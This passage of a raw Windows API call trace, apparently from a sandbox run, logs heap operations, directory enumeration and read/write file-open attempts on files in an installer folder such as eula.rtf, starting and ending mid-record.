(HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.420] AreFileApisANSI () returned 1 [0060.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0060.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0060.421] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0060.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.494] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.494] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.494] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x45e90, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0060.495] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.495] AreFileApisANSI () returned 1 [0060.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030", lpUsedDefaultChar=0x0) returned 27 [0060.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.496] AreFileApisANSI () returned 1 [0060.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030") returned 27 [0060.496] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030" (normalized: "c:\\588bce7c90097ed212\\1030"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.496] GetLastError () returned 0x5 [0060.496] GetLastError () returned 0x5 [0060.496] SetLastError (dwErrCode=0x5) [0060.496] GetLastError () returned 0x5 [0060.496] SetLastError (dwErrCode=0x5) [0060.496] GetLastError () returned 0x5 [0060.496] SetLastError (dwErrCode=0x5) [0060.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.496] AreFileApisANSI () returned 1 [0060.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030") returned 27 [0060.497] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030" (normalized: "c:\\588bce7c90097ed212\\1030"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.497] GetLastError () returned 0x5 [0060.497] GetLastError () returned 0x5 [0060.497] SetLastError (dwErrCode=0x5) [0060.497] GetLastError () returned 0x5 [0060.497] SetLastError (dwErrCode=0x5) [0060.497] GetLastError () returned 0x5 [0060.497] SetLastError (dwErrCode=0x5) [0060.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.497] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.497] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1031", cAlternateFileName="")) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.497] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.498] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.498] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0060.498] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0060.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.499] AreFileApisANSI () returned 1 [0060.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.499] AreFileApisANSI () returned 1 [0060.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0060.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0060.500] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.500] GetFileType (hFile=0x424) returned 0x1 [0060.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.500] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.500] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.500] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.500] CloseHandle (hObject=0x424) returned 1 [0060.501] AreFileApisANSI () returned 1 [0060.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0060.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0060.501] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.501] GetFileType (hFile=0x424) returned 0x1 [0060.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.502] CloseHandle (hObject=0x424) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.503] AreFileApisANSI () returned 1 [0060.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0060.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0060.503] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2)) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.503] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, 